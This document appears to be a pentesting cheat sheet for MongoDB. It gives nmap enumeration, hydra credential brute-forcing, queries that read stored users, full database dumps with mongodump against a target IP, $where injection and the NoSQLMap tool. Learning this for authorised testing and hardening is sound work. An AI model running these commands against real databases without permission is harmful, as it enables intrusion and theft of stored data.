MongoDB 27017

1. Nmap Scans for MongoDB

nmap --script mongodb-info -p 27017 <target-ip>

For database enumeration:

nmap --script mongodb-databases -p 27017 <target-ip>

2. Brute Forcing Credentials

hydra -l username -P passwords.txt <target-ip> mongodb

hydra -L usernames.txt -p password <target-ip> mongodb

3. Connecting to MongoDB

mongo
mongo --port 27017

mongo --host <target-ip> --port 27017

For authenticated access:

mongo "mongodb://username:password@<target-ip>:27017/?authSource=admin"

4. Basic Commands

show dbs

use <db_name>

show collections

show users

db.system.users.find()

load("example.js")

5. Data Retrieval Using Queries

db.<collection_name>.find()

db.<collection_name>.findOne({username: "admin"})

Operators:

$eq: Equal

db.<collection_name>.findOne({username: {"$eq": "admin"}})

$ne: Not equal

db.<collection_name>.findOne({password: {"$ne": "xyz"}})

$gt: Greater than

db.<collection_name>.findOne({id: {"$gt": "2"}})

6. Exploitation Techniques

Unsecured Instances:
- Unauthenticated MongoDB instances allow direct access. Simply connect using:
  mongo <target-ip>:27017
- Dump all databases:
  show dbs db.<db_name>.find()
- Export data using mongodump:
  mongodump --host <target-ip> --port 27017 --out <output-dir>
Weak Credentials:
- If credentials are identified (e.g., via brute force), authenticate and escalate data access.
No Authorization Restrictions:
- Misconfigured MongoDB can allow creation or modification of collections:
  db.createCollection("new_collection") db.new_collection.insert({"key": "value"})
Script Injection via $where:
- Execute JavaScript within queries:
  db.<collection_name>.find({$where: "this.username == 'admin'"})

7. Automation with Scripts

You can automate enumeration and exploitation using custom scripts or tools:

Python automation script:

sudo git clone https://github.com/kozmic/NoSQLMap.git
cd NoSQLMap
python nosqlmap.py

Last updated 1 year ago